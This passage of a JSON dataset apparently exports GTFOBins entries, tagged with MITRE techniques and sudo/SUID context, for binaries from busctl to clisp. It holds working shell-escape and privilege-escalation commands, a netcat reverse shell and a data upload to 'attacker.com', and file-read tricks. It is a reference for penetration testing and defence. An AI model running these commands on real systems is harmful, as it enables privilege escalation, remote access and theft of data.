--show-machine","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busybox:inherit:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:byebug:inherit:0:sudo","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:byebug:inherit:0:unprivileged","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:bzip2:file-read:0:sudo","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:suid","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:unprivileged","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:cabal:shell:0:sudo","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:suid","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:unprivileged","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cancel:upload:0:sudo","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:suid","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:unprivileged","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:capsh:shell:0:sudo","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:suid","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --gid=0 --uid=0 --","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:unprivileged","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:cargo:inherit:0:sudo","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cargo:inherit:0:unprivileged","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cat:file-read:0:sudo","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:suid","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:unprivileged","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cdist:shell:0:sudo","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:cdist:shell:0:unprivileged","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:certbot:shell:0:sudo","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:certbot:shell:0:unprivileged","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:chattr:privilege-escalation:0:sudo","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:chattr:privilege-escalation:0:suid","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:check_by_ssh:shell:0:sudo","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_by_ssh:shell:0:unprivileged","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_cups:file-read:0:sudo","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_cups:file-read:0:unprivileged","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_log:file-read:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-read:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_memory:file-read:0:sudo","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_memory:file-read:0:unprivileged","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_raid:file-read:0:sudo","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_raid:file-read:0:unprivileged","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_ssl_cert:shell:0:sudo","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_ssl_cert:shell:0:unprivileged","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_statusfile:file-read:0:sudo","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:check_statusfile:file-read:0:unprivileged","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:chmod:privilege-escalation:0:sudo","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:chmod:privilege-escalation:0:suid","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:choom:shell:0:sudo","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:suid","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:unprivileged","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:chown:privilege-escalation:0:sudo","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chown:privilege-escalation:0:suid","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chroot:shell:0:sudo","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot /","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chroot:shell:0:suid","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chrt:shell:0:sudo","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:suid","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh -p","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:unprivileged","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:clamscan:file-read:0:sudo","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:suid","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:unprivileged","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clisp:shell:0:sudo","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:suid","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command 